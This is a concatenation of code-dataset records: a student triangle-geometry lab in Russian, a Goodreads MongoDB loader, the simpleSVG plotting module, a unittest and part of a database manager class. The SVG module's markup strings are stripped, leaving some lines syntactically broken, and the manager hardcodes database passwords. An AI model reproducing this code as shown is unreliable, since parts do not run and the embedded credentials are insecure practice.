y1\r\n\r\n# Пусть a = AB, b = BC, c = AC\r\n\r\na = sqrt(ABx * ABx + ABy * ABy) # Находим длины сторон треугольника\r\nb = sqrt(BCx * BCx + BCy * BCy)\r\nc = sqrt(ACx * ACx + ACy * ACy)\r\n\r\nif abs(a - b - c) >= 0.01 or abs(b - a - c) >= 0.01 or abs(c - a - b) >= 0.01:\r\n print()\r\n print('Такого треугольника не существует')\r\nelse:\r\n p = (a + b + c) / 2 # Полупериметр треугольника\r\n s = sqrt(p * (p - a) * (p - b) * (p - c)) # Площадь треугольника\r\n\r\n if a > b and a > c: # Поиск наибольшей стороны\r\n h = (2 * s) / a # Находим длину высоты\r\n elif b > a and b > c:\r\n h = (2 * s) / b\r\n elif c > a and c > b:\r\n h = (2 * s) / c\r\n\r\n x4 = float(input('Введите x-координату точки: '))\r\n y4 = float(input('Введите y-координату точки: '))\r\n\r\n AOx = x4 - x1 # Находим координаты векторов AO, BO, CO, где O -\r\n AOy = y4 - y1 # точка с координатами (x4; y4)\r\n BOx = x4 - x2\r\n BOy = y4 - y2\r\n COx = x4 - x3\r\n COy = y4 - y3\r\n\r\n AO_length = sqrt(AOx * AOx + AOy * AOy) # Длины отрезков, соединяющих точку O с вершинами\r\n BO_length = sqrt(BOx * BOx + BOy * BOy)\r\n CO_length = sqrt(COx * COx + COy * COy)\r\n\r\n p1 = (a + AO_length + BO_length) / 2\r\n s1 = sqrt(p1 * (p1 - a) * (p1 - AO_length) * (p1 - BO_length))\r\n p2 = (b + BO_length + CO_length) / 2\r\n s2 = sqrt(p2 * (p2 - b) * (p2 - CO_length) * (p2 - BO_length))\r\n p3 = (c + AO_length + CO_length) / 2\r\n s3 = sqrt(p3 * (p3 - c) * (p3 - CO_length) * (p3 - AO_length))\r\n\r\n print()\r\n print('Длина стороны a: {:3.2f}, длина стороны b: {:3.2f}, '\r\n 'длина стороны c: {:3.2f}'.format(a, b, c))\r\n print('Длина высоты, проведенной из наибольшего угла: {:3.2f}'.format(h))\r\n if abs(s - (s1 + s2 + s3)) <= 0.01:\r\n l1 = (2 * s1) / a\r\n l2 = (2 * s2) / b\r\n l3 = (2 * s3) / c\r\n if l1 <= l2 and l1 <= l3:\r\n l = l1\r\n elif l2 <= l1 and l2 <= l3:\r\n l = l2\r\n else:\r\n l = l3\r\n print('Точка O({};{}) принадлежит треугольнику'.format(x4, y4))\r\n print('Расстояние от точки O до ближайшей стороны: {:3.2f}'.format(l))\r\n else:\r\n print('Точка O({};{}) не принадлежит треугольнику'.format(x4, y4))\r\n if a > b and a > c:\r\n if a * a > c * c + b * b + 0.01:\r\n print('Треугольник тупоугольный')\r\n else:\r\n print('Треугольник не тупоугольный')\r\n elif b > a and b > c:\r\n if b * b > c * c + a * a + 0.01:\r\n print('Треугольник тупоугольный')\r\n else:\r\n print('Треугольник не тупоугольный')\r\n else:\r\n if c * c > b * b + a * a + 0.01:\r\n print('Треугольник тупоугольный')\r\n else:\r\n print('Треугольник не тупоугольный')\r\n","repo_name":"marchenko-vs/ics7-pyprog","sub_path":"sem_01/lab_03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"18037109791","text":"from pymongo import MongoClient\nfrom mimesis import Text\nimport pandas as pd\nfrom progress.bar import Bar\n\nclient = MongoClient()\ntext_faker = Text(locale='en')\n\n\ndef connect_db(db_name, collection_name):\n db = client[db_name]\n collection = db[collection_name]\n return collection\n\n\ndef store_books():\n books_collection = connect_db('goodreads', 'books')\n df_books = pd.read_csv('./goodbooks-10k/books.csv', index_col=0)\n books_list = []\n bar = Bar('Processing books', max=len(df_books))\n for idx, book in df_books.iterrows():\n data = {\n 'bookId': book['book_id'],\n 'workId': book['work_id'],\n 'originalTitle': book['original_title'],\n 'title': book['title'],\n 'isbn': book['isbn'],\n 'isbn13': book['isbn13'],\n 'authors': book['authors'].split(','),\n 'publicationYear': book['original_publication_year'],\n 'languageCode': book['language_code'],\n 'avgRating': book['average_rating'],\n 'ratingsCount': book['ratings_count'],\n 'workRatingsCount': book['work_ratings_count'],\n 'workTextReviewsCount': book['work_ratings_count'],\n 'ratings1': book['ratings_1'],\n 'ratings2': book['ratings_2'],\n 'ratings3': book['ratings_3'],\n 'ratings4': book['ratings_4'],\n 'ratings5': book['ratings_5'],\n 'coverURL': book['image_url'],\n 'smallCoverURL': book['small_image_url'],\n 'Description': text_faker.text(),\n }\n books_list.append(data)\n bar.next()\n bar.finish()\n result = books_collection.insert_many(books_list)\n print(f'{len(result.inserted_ids)} inserted books')\n\n\ndef main():\n store_books()\n\n\nif __name__ == '__main__':\n main()","repo_name":"leiverandres/goodreads-graphql","sub_path":"init_database.py","file_name":"init_database.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"40602954731","text":"# simpleSVG.py is a module for generating SVG graphics.\n# It is especially useful for constructing nonstandard plots which are \n# not offered by a high level function call in the usual plotting packages. \n# Recommend that your first learn SVG, such as at http://www.svgbasics.com/index.html\n# Put this Python module either in your Python path or in your current working directory.\n# A test graphic is output by executing the module, e.g. in Linux: python simpleSVG.py\n# Written by Brian Fiedler, after some exploratory motivation by Charlie Pham. \n# v0.1 December 25, 2007 \n# v0.11 February 2, 2008, image command added\n# v0.12 October 6, 2008, clipping ability added\n# v0.13 January 4, 2010, added arc, and a few other things \n# v0.14 May 12, 2010, added radial \n# v0.20 June 22, 2011. Now works with both Python 2.6 and Python 3.1 \n####\n\n\nimport os,sys\nfrom math import *\n#from __future__ import print_function\ndisplay_prog = 'inkscape' #command to display images, using optional display() method\npyvers=sys.version_info[0]\nif pyvers >=3:\n\timport fractions\n\tfractype=type(fractions.Fraction(1,2))\n\nclass svg_class:\n\tdef __init__(self,fname=\"temp.svg\",bbx=512,bby=512,whiteback=True):\n\t\tself.fname = fname\n\t\tself.bbx = int(bbx)\n\t\tself.bby = int(bby)\n\t\tself.svg=open(self.fname,'w')\n\t\tself.group_count=0\n\t\theader = \"\"\"\n\n \n\"\"\" % (self.bby,self.bbx)\n\t\tself.svg.write(header)\n\t\tif whiteback: self.rect(0,0,self.bbx,self.bby,fill=\"white\") \n\t\tself.group(fill_opacity=1., fill=\"none\", stroke=\"black\", stroke_width=1,\n font_size=\"10pt\", font_family=\"Arial, sans-serif\") \n#\t\tself.scale() # after v.12, scale must be called explicitly, to prevent clipPath from premature definition \n\n\tdef close(self):\n\t\twhile self.group_count>=1: self.group()\n\t\tendfile = \"\\n\"\n\t\tself.svg.write(endfile)\n\t\tsys.stdout.write(\"The file \"+self.fname+\" was successfully written and closed by simpleSVG\\n\")\n\t\tself.svg.close()\n\t\treturn\n\n\tdef display(self,prog=display_prog):\n\t\tos.system(\"%s %s\" % (prog,self.fname))\n\t\treturn\n\n\tdef scale(self,xmin=0.,xmax=1.,ymin=0.,ymax=1., #sets the user coordinates\n\t\t\tleftmarg=50,rightmarg=50,botmarg=50,topmarg=50):\n\t\tself.xmin=xmin\n\t\tself.xmax=xmax\n\t\tself.ymin=ymin\n\t\tself.ymax=ymax\n\t\tself.leftmarg=leftmarg\n\t\tself.rightmarg=rightmarg\n\t\tself.botmarg=botmarg\n\t\tself.topmarg=topmarg\n\t\tself.xscale=float(self.bbx-self.leftmarg-self.rightmarg)/(self.xmax-self.xmin)\n\t\tself.yscale=float(self.bby-self.botmarg -self.topmarg )/(self.ymax-self.ymin)\n\t\tclippath=\"\"\"\n\n\n\"\"\" % (\nself.leftmarg, self.topmarg, self.bbx-self.leftmarg-self.rightmarg, self.bby-self.topmarg-self.botmarg)\n\t\tself.svg.write(clippath)\n\n\tdef ix(self,x): #svg x coordinate in pts as function of various types of user \"x\"\n\t\tif isinstance(x,float):\n\t\t\treturn self.leftmarg+(x-self.xmin)*self.xscale\n\t\telif isinstance(x,complex):\n\t\t\treturn x.imag*self.bbx\n\t\telif pyvers<3 and isinstance(x,long):\n\t\t\treturn x*.01\n\t\telif pyvers>=3 and type(x)==fractype:\n\t\t\treturn float(x) \n\t\telse:\n\t\t\treturn x \n\n\tdef jy(self,y): #svg y coordinate in pts as function of various types of user \"y\"\n\t\tif isinstance(y,float):\n\t\t\treturn self.bby-(self.botmarg+(y-self.ymin)*self.yscale)\n\t\telif isinstance(y,complex):\n\t\t\treturn y.imag*self.bby\n\t\telif pyvers<3 and isinstance(y,long):\n\t\t\treturn y*.01\n\t\telif pyvers>=3 and type(y)==fractype:\n\t\t\treturn float(y) \n\t\telse:\n\t\t\treturn y\n\t\t\n#sizes of things are scaled a bit differently from a position of a thing.\n\tdef sx(self,x): #pt size for fonts, ticks, radius, relative displacement etc., as function of user \"x\" size\n\t\tif isinstance(x,float):\n\t\t\treturn x*self.xscale\n\t\telif isinstance(x,complex):\n\t\t\treturn x.imag*self.bbx\n\t\telif pyvers<3 and isinstance(x,long):\n\t\t\treturn x*.01\n\t\telif pyvers>=3 and type(x)==fractype:\n\t\t\treturn float(x) \n\t\telse:\n\t\t\treturn x \n\t\t\n\tdef sy(self,y): #pt size for fonts, ticks, radius, relative displacement etc., as function of user \"y\" size\n\t\tif isinstance(y,float):\n\t\t\treturn -y*self.yscale #note minus sign!!\n\t\telif isinstance(y,complex):\n\t\t\treturn y.imag*self.bby\n\t\telif pyvers<3 and isinstance(y,long):\n\t\t\treturn y*.01\n\t\telif pyvers>=3 and type(y)==fractype:\n\t\t\treturn float(y) \n\t\telse:\n\t\t\treturn y \n\n\tdef pathdata(self,*a):\n\t\tb=[] #will store all the numbers and sequences of coordinates between the tags\n\t\ts=\"\" #a formatted string of all the coordinate pair numbers\n\t\td=\"\" #the pathdata string, for use in \\n')\n\n\tdef group(self,**k):\n\t\tif not k and self.group_count>=1:\n\t\t\tself.group_count-=1\n\t\t\tself.svg.write('\\n')\n\t\telse:\n\t\t\tstyle=k.pop('style',\"\")\n\t\t\ttransform=k.pop('transform',\"\")\n\t\t\tclippath=k.pop('clip_path',\"\")\n\t\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\t\tself.group_count+=1\n\t\t\tg='\\n')\n\t\t\t \n\n#SIMPLE DRAWING\n\n\tdef rect(self,x,y,width,height,**k): #better than native: negative width and height okay\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\td=self.pathdata('M',x,y,'l',width,0,'l',0,height,'l',-width,0,'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef rect2(self,x1,y1,x2,y2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\td=self.pathdata('M',x1,y1,'L',x2,y1,'L',x2,y2,'L',x1,y2,'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef poly(self,*a,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tb=[x for x in flattn(a)] \n\t\td=self.pathdata('M',b[0:2],'L',b[2:],'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef draw(self,*a,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tb=[x for x in flattn(a)] \n\t\td=self.pathdata('M',b[0:2],'L',b[2:])\n\t\tself.path(d=d,style=style)\n\n\tdef circle(self,cx,cy,r,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tp='\\n')\n\n\tdef line(self,x1,y1,x2,y2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tp='\\n')\n\n\tdef text(self,x,y,angle,text,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tp='\\n'\n\t\tself.svg.write(p)\n\n#sector with center at user (x,y), but radius r1 and r2 are in pts:\n\tdef sector(self,x,y,r1,r2,a1,a2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tlargecircle='0'\n\t\tif (a2180: largecircle='1'\n\t\ta1=pi*a1/180.\n\t\ta2=pi*a2/180.\n\t\tx11=r1*cos(a1)\n\t\tx21=r2*cos(a1)\n\t\tx12=r1*cos(a2)\n\t\tx22=r2*cos(a2)\n\t\ty11=r1*sin(a1)\n\t\ty21=r2*sin(a1)\n\t\ty12=r1*sin(a2)\n\t\ty22=r2*sin(a2)\n\t\td=self.pathdata('M',x,y,'m',hires(x21),hires(-y21),'a',hires(r2),hires(r2),'0',largecircle+',0',hires(x22-x21),hires(-y22+y21),\\\n 'l',hires(x12-x22),hires(-y12+y22),'a',hires(r1),hires(r1),'0',largecircle+',1',hires(x11-x12),hires(-y11+y12),'Z')\n\t\tself.path(d=d,style=style)\n\n\tdef radial(self,x,y,r1,r2,a1,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tlargecircle='0'\n\t\ta1=pi*a1/180.\n\t\tx11=r1*cos(a1)\n\t\tx21=r2*cos(a1)\n\t\ty11=r1*sin(a1)\n\t\ty21=r2*sin(a1)\n\t\td=self.pathdata('M',x,y,'m',hires(x21),hires(-y21),'l',hires(x11-x21),hires(-y11+y21))\n\t\tself.path(d=d,style=style)\n\n\tdef arc(self,x,y,r,a1,a2,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tlargecircle='0'\n\t\tif (a2180: largecircle='1'\n\t\ta1=pi*a1/180.\n\t\ta2=pi*a2/180.\n\t\tx21=r*cos(a1)\n\t\tx22=r*cos(a2)\n\t\ty21=r*sin(a1)\n\t\ty22=r*sin(a2)\n\t\td=self.pathdata('M',x,y,'m',hires(x21),hires(-y21),'a',hires(r),hires(r),'0',largecircle+',0',hires(x22-x21),hires(-y22+y21))\n\t\tself.path(d=d,style=style)\n\n#COMPOSITE DRAWING\n\tdef square(self,x,y,size,**k): #analog to circle, useful for plot symbol\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tself.group(style=style)\n\t\ti,j=hires(self.ix(x)),hires(self.jy(y))\n\t\tl=size*100\n\t\tself.rect2(i-l,j-l,i+l,j+l,style=style)\n\t\tself.group()\n\n\tdef arrow(self,x1,y1,x2,y2,headsize,**k): #headsize is in pts\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\tself.group(style=style)\n\t\ti1,j1,i2,j2=self.ix(x1),self.jy(y1),self.ix(x2),self.jy(y2)\n\t\theadsize=self.sx(headsize)\n\t\tr=sqrt((i2-i1)**2+(j2-j1)**2)\n\t\tu=(i2-i1)/r\n\t\tv=(j2-j1)/r\n\t\tai=-.8*u-.6*v\n\t\taj=.6*u-.8*v\n\t\tbi=-.8*u+.6*v\n\t\tbj=-.6*u-.8*v\n\t\tx2=hires(i2+.5*headsize*(ai+bi))\n\t\ty2=hires(j2+.5*headsize*(aj+bj))\n\t\tself.line(x1,y1,x2,y2)\n\t\tself.path('M',hires(i2),hires(j2),'L',hires(i2+headsize*ai),hires(j2+headsize*aj),\\\n\t\t'L',hires(i2+headsize*bi),hires(j2+headsize*bj),'Z',stroke='none')\n\t\tself.group()\n\t\t\n\tdef fatarrow(self,x1,y1,x2,y2,asize,**k): #asize is the half-width of the fat arrow\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\ti1,j1,i2,j2=self.ix(x1),self.jy(y1),self.ix(x2),self.jy(y2)\n\t\tasize=self.sx(asize)\n\t\tr=sqrt((i2-i1)**2+(j2-j1)**2)\n\t\tu=asize*(i2-i1)/r\n\t\tv=asize*(j2-j1)/r\n\t\tpolypoints=[hires(q) for q in [i1+v,j1-u,\n\t\ti2+v-u,j2-u-v, i2,j2, i2-v-u,j2+u-v, i1-v,j1+u]]\n\t\tself.poly(polypoints,style=style)\n\n\tdef windbarb(self,x,y,s,a,h,**k):\n\t\tstyle=k.pop('style',\"\")\n\t\tfor key in k.keys(): style+=key.replace('_','-')+':'+str(k[key])+';'\n\t\ttransform= \"translate(%8.2f,%8.2f) rotate(%8.2f) \" % (self.ix(x),self.jy(y),a-90)\n\t\tself.group(style=style,transform=transform)\n\t\ti1,j1=self.ix(x),self.jy(y)\n\t\ta=0.\n\t\ti1=0.\n\t\tj1=0.\n\t\td=.13*h\n\t\tf=.5*h\n\t\tif s>=2.50:\n\t\t\tp=[0,0,-h,0]\n\t\t\tself.draw([hires(z) for z in p ])\n\t\telse:\n\t\t\tself.circle(hires(i1),hires(j1),int(abs(d)),fill='none')\n\t\tw=-h+d\n\t\tif s<47.50 and s>=7.50: w=-h\n\t\twhile s>=47.50:\n#\t\t\tp=[w,0,w-d,f,w-d,0]\n\t\t\tp=[w,0,w-d,-f,w-d,0]\n\t\t\tself.poly([hires(z) for z in p])\n\t\t\ts=s-50.\n\t\t\tw=w+d\n\t\twhile s>=7.50:\n#\t\t\tp=[w,0,w-d,f]\n\t\t\tp=[w,0,w-d,-f]\n\t\t\tself.draw([hires(z) for z in p])\n\t\t\ts=s-10.\n\t\t\tw=w+d\n\t\twhile s>=2.50:\n#\t\t\tp=[w,0,w-.5*d,.5*f]\n\t\t\tp=[w,0,w-.5*d,-.5*f]\n\t\t\tself.draw([hires(z) for z in p])\n\t\t\ts=s-5.\n\t\t\tw=w+d\n\t\tself.group()\n\tdef image(self,x,y,file,**k):\n\t\tp='\\n')\n\n#AXES DRAWING\n#If you don't use the defaults, you should call these using your user coordinates only,\n#except for ticklen and pad, which can be passed as an integer\n\tdef xaxis(self, y=\"\", #where to intersect the y-axis\n\t\t\tx1=\"\", #smallest x\n\t\t\tdx=\"\", #increment for tick marks\n\t\t\tx2=\"\", #largest x\n\t\t\tticklen=10, #length of ticks, in pts\n\t\t\tgrid=False,\n\t\t\txticks=None,\n\t\t\tpad=10, #padding for tick labels, usually fontsize\n\t\t\tform='%5.1f'): #format string for numerical labels\n#\t\tself.rect2(self.leftmarg,self.topmarg,self.bbx-self.rightmarg,self.bby-self.botmarg,fill=\"yellow\") #for testing \n\t\tif y==\"\": y=self.ymin\n\t\tif x1==\"\": x1=self.xmin\n\t\tif x2==\"\": x2=self.xmax\n\t\tif dx==\"\": dx=(self.xmax-self.xmin)*.1\n\t\tif xticks==None: xticks=[]\n\t\ty,x1,x2,dx=map(float,[y,x1,x2,dx])\n\t\tif grid:\n\t\t\ty2=float(self.ymax)\n\t\t\tself.line(x1,y2,x2,y2)\n\t\t\tticklen=self.jy(y2)-self.jy(y)\n\t\telse:\n\t\t\tticklen=self.sy(ticklen)\n\t\tself.line(x1,y,x2,y)\n\t\tif not xticks:\n\t\t\tx=x1\n\t\t\twhile x < x2*1.00001: #make tick marks\n\t\t\t\txticks.append(x)\n\t\t\t\tx=x+dx\n\t\tfor x in xticks: #make tick marks\n\t\t\tif form: str=form % x\n\t\t\tself.path('M',x,y,'l',0,-ticklen)\n\t\t\tif form: self.text(x,y-1.5*pad/self.yscale,0,str,stroke_width=\".3pt\",text_anchor='middle')\n\n\tdef yaxis(self, x=\"\", #where to intersect the x-axis\n\t\t\ty1=\"\", #smallest y\n\t\t\tdy=\"\", #increment for tick marks\n\t\t\ty2=\"\", #largest y\n\t\t\tticklen=10, #length of ticks, in pts\n\t\t\tgrid=False,\n\t\t\tyticks=None,\n\t\t\tpad=10, #padding for tick labels, usually fontsize\n\t\t\tform='%5.1f'): #format for numerical labels\n\t\tif x==\"\": x=self.xmin\n\t\tif y1==\"\": y1=self.ymin\n\t\tif y2==\"\": y2=self.ymax\n\t\tif dy==\"\": dy=(self.ymax-self.ymin)*.1\n\t\tif yticks==None: yticks=[]\n\t\tx,y1,y2,dy=map(float,[x,y1,y2,dy])\n\t\tself.line(x,y1,x,y2)\n\t\tif grid:\n\t\t\tx2=float(self.xmax)\n\t\t\tself.line(x2,y1,x2,y2)\n\t\t\tticklen=self.ix(x2)-self.ix(x)\n\t\telse:\n\t\t\tticklen=self.sx(ticklen)\n\t\tif not yticks:\n\t\t\ty=y1\n\t\t\twhile y < y2*1.00001: \n\t\t\t\tyticks.append(y)\n\t\t\t\ty=y+dy\n\t\tfor y in yticks: #render tick marks and labels\n\t\t\tif form: str=form % y\n\t\t\tself.path('M',x,y,'l',ticklen,0)\n\t\t\tif form: self.text(x-.5*pad/self.xscale,y-.5*pad/self.yscale,0,str,stroke_width=\".3pt\",text_anchor='end')\n\n\t\t\n### some functions independent of svg_class\n\t\nif pyvers<3: #long integers are hi-res svg coordinates\n\tdef hires(x): #converts svg (pts) coordinates to hi-res coordinate type\n\t\treturn long(100*x)\nelse: #Python version 3.0 no longer supports long integers\n\tdef hires(x): #converts svg (pts) coordinates to hi-res coordinate type\n\t\treturn(fractions.Fraction(int(x*100),100))\n\n#following is from \n# http://www.ubookcase.com/book/Oreilly/Python.Cookbook.2nd.edition/0596007973/pythoncook2-chp-4-sect-6.html\n# changed name flatten -> flatten to avoid namespace conflicts\n#-----\ndef list_or_tuple(x):\n\treturn isinstance(x, (list, tuple))\ndef flattn(sequence, to_expand=list_or_tuple):\n\tfor item in sequence:\n\t\tif to_expand(item):\n\t\t\tfor subitem in flattn(item, to_expand):\n\t\t\t\tyield subitem\n\t\telse:\n\t\t\tyield item\n#-----\n\ndef rgbstring(*colors): \n\tif colors:\n\t\tf=colors[0]\n\t\tif isinstance(f,list) or isinstance(f,tuple):\n\t\t\tr,g,b=f\n\t\telif len(colors)==3: r,g,b=colors\n\t\telse: r,g,b=colors[0],colors[0],colors[0]\n\telse:\n\t\tr,g,b=0,0,0\n\tif isinstance(r,float): r=255.*r\t\n\tif isinstance(g,float): g=255.*g\t\n\tif isinstance(b,float): b=255.*b\t\n\treturn \"rgb(%d,%d,%d)\" % (r,g,b)\n\ndef stylestring(**k): \n\ts=\"\"\n\tfor key in k.keys():\n\t\ts+=key.replace('_','-')+':'+str(k[key])+';'\n\treturn s\n\ndef SVGtest():\n\timport simpleSVG \n\tsys.stdout.write(\"A sample plot will be output as testSVG.svg\\n\")\n\ta=simpleSVG.svg_class(fname='testSVG.svg',bbx=600,bby=600) #override defaults for bbx and bby\n\ta.scale() #uses default scaling of coordinates (x=0. to x=1.0, y=0. to y=1.0) \n\ta.group(fill='black')#otherwise fonts are hollow\n\ta.yaxis()\n\ta.xaxis(dx=.2,form='%9.2e')\n\ta.group()\n\tmypath=a.pathdata('M',[150,400],'l',(50,50),'l',-50,50,'l',-50,-50,'l',50,-50,'Z') #optional use of [] and ()\n\tmystyle=stylestring(stroke=\"olive\",fill=\"#49bab6\",stroke_width=10) #two ways to specify colors; note '_' replaces '-' in SVG parameters\n\ta.path(d=mypath,style=mystyle) # render the path\n\tcolor1='rgb(100,150,200)' #third way to define color \n\tcolor2=rgbstring(.6,.7,200) #fourth way, real numbers will be multiplied by 255\n\ta.path('M',200,300,'l',50,50,'l',-50,50,'l',-50,-50,'l',50,-50,'Z',\n\t\tfill=color1,stroke=color2,stroke_width=5) # make path from positional arguements, make a style string from keyword arguments\n\t# if style= is passed, it will prepend the style string made from keyword arguments:\n\ta.circle(.5,.3,20,style=mystyle,stroke='none')\n\ta.line(.5,.5,.4,.5)\n\ta.group(stroke_width=5) #apply this style to all items in the group\n\ta.line(.5,.5,.4,.6)\n\ta.line(300,simpleSVG.hires(300.23),.5,.6,stroke=\"lime\") #demonstates using a hi-res coordinate\n#\ta.line(300,30023L,.5,.6,stroke=\"lime\") # long integers (*100) for hi-res coordinate are deprecated\n\ta.line(300,300,.5,.6,stroke=\"lime\") #same central starting point, specified two ways in SVG coords\n\ta.path('M',300,300,'l',.1,.1,stroke=\"red\",stroke_dasharray='3,2') #a line is easily made from path too\n\ta.fatarrow(.5,.5,.7,.5,10,fill='green',stroke='none') #arrow is like line, but with a headsize\n\ta.arrow(.5,.5,.7,.4,10,stroke_width=3,stroke='maroon',fill='black') #fill is for the head\n\ta.group()\n\ta.path('M',.7,.1,'l',.1,.1,.0,.1,-.1,.1,'Z',fill='gray',stroke='none') #path closed with 'Z ' makes polygon\n\ta.poly(.9,.1,1.,.2,1.,.3,.9,.4,fill='silver',stroke='none') #same poly as above, shifted. Must use abs. coords.\n\ta.draw(.9,.1,1.,.2,1.,.3,.9,.4,stroke_width=3) #draw is similar to poly, but not closed\n\ta.arc(.8,.65,30,20,180,stroke='brown',stroke_width=10) #arc has radius 30, spans angle 20 to 180\n\ta.arc(.8,.65,60,20,245,stroke='purple',stroke_width=15) #arc had radius 60, spans angle 20 to 245\n\ta.radial(.8,.65,60,80,132.5,stroke='purple',stroke_width=15) #draw radial from radius of 60 to 80, at angle 132.5\n\ta.sector(.7,.85,30,100,10,45,fill='red',stroke='black') #sector has radii 30 and 100, spans angle 10 to 45\n\ta.rect(.7,.8,.35,.25,fill='none',stroke='aqua',stroke_width=3) #specify with width and height\n\ta.rect2(.72,.82,1.03,1.03,fill='none',stroke='yellow',stroke_width=5) #specify with two opposite vertices\n\ta.text(.2,.1,0,'hello',font_size=\"60pt\",fill=\"lime\")\n\ta.text(.5,.3,60,'again',font_size=\"48pt\",text_anchor='middle') #rotate text by 60 degrees, place middle of text at x,y\n\ta.group(fill='black')\n\ta.windbarb(.05,.95,0,40,50,stroke_width=1) #x,y,speed,dir,size\n\ta.windbarb(.10,.90,7,30,50,stroke_width=1)\n\ta.windbarb(.15,.85,47,20,50,stroke_width=1)\n\ta.windbarb(.20,.80,107,10,80,stroke_width=1)\n\ta.group()\n\ta.group(clip_path=r'url(#marginmask)')\n\ta.text(.5,.85,60,'clipped',font_size=\"24pt\",text_anchor='left') #demonstrates clipping\n\ta.group()\n\ta.text(.35,.80,60,' not clipped',font_size=\"24pt\",text_anchor='left') \n\ta.close()\n\ta.display()\n\t\nif __name__=='__main__':\n\tSVGtest()\n","repo_name":"bfiedler/simpleSVG","sub_path":"simpleSVG.py","file_name":"simpleSVG.py","file_ext":"py","file_size_in_byte":19789,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"30"} +{"seq_id":"19827014187","text":"import unittest\nfrom cvs_commit import CommitIndex\n\n\nclass TestCommitIndex(unittest.TestCase):\n def setUp(self) -> None:\n self.index = CommitIndex()\n self.index.new = ['a\\\\b.txt', 'p.txt', 'a\\\\v\\\\m.txt']\n self.index.edited = ['a\\\\c.txt', 's.txt']\n self.index.deleted = ['a\\\\v\\\\p.txt']\n\n def testAllFiled(self):\n expected = {'a\\\\b.txt', 'p.txt', 'a\\\\v\\\\m.txt',\n 'a\\\\c.txt', 's.txt', 'a\\\\v\\\\p.txt'}\n result = self.index.all_files\n self.assertEqual(expected, set(result))\n\n def testGetDirs(self):\n expected = {'a', 'a\\\\v'}\n result = self.index.get_dirs()\n self.assertEqual(expected, result)\n\n def testContains(self):\n item = 'a\\\\v\\\\p.txt'\n self.assertTrue(item in self.index)\n\n def testNotContains(self):\n item = 'a\\\\v\\\\z.txt'\n self.assertFalse(item in self.index)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"KuchinStepan/CVS","sub_path":"tests/test_cvs_commit_index.py","file_name":"test_cvs_commit_index.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"71304482966","text":"from ast import literal_eval as make_tuple\nfrom typing import List, Set, Tuple\nfrom multiprocessing import Lock\nimport psycopg2\nimport copy\nimport pymongo\nfrom .data_manager_interface import DataManagerInterface\n\nclass DataManager(DataManagerInterface):\n def __init__(self):\n super().__init__()\n\n self._camera_station_frames = {}\n self._camera_weight_frames = {}\n self._camera_infos = {} #{id : [names, args]}\n self._station_cameras = {} #{station_id : [camera_id]}\n self._exercises = {}\n self._station_exercises = {}\n\n try:\n self._connection = psycopg2.connect(user=\"trainerai\",\n password=\"esel1212\",\n host=\"127.0.0.1\",\n port=\"5432\",\n database=\"trainerai_db\")\n self._cursor = self._connection.cursor()\n except psycopg2.Error as error:\n raise RuntimeError('Failed to open database') from error\n\n self._update_frames()\n self._update_camera_infos()\n self._update_station_camera()\n self._load_station_exercises()\n self._mongo_is_on = self._load_exercises()\n\n self._frame_mutex = Lock()\n self._camera_info_mutex = Lock()\n self._station_camera_mutex = Lock()\n self._postgres_mutex = Lock()\n\n def __del__(self):\n print(\"close data manager\")\n self._cursor.close()\n self._connection.close()\n\n def _load_exercises(self):\n mongo_client = pymongo.MongoClient(\"mongodb://mongoadmin:secret@localhost:27888/?authSource=admin\", serverSelectionTimeoutMS=2000)\n if mongo_client is None:\n return False\n db = mongo_client.trainerai\n exercises = db.exercises\n x = exercises.find()\n self._exercises = {}\n for data in x:\n try:\n self._exercises[int(data[\"name\"])] = data[\"description\"]\n except:\n pass\n return True\n\n def _load_station_exercises(self):\n select_query = 'select \"stationId\", \"exerciseId\" from exercises'\n try:\n self._cursor.execute(select_query)\n mobile_records = self._cursor.fetchall()\n exercise_list = {}\n for row in mobile_records:\n print(row)\n if row[0] not in exercise_list:\n exercise_list[row[0]] = []\n exercise_list[row[0]].append(row[1])\n self._station_exercises = exercise_list\n except psycopg2.Error as error:\n raise RuntimeError(\"Error while fetching station exercises from PostgreSQL\") from error\n\n def 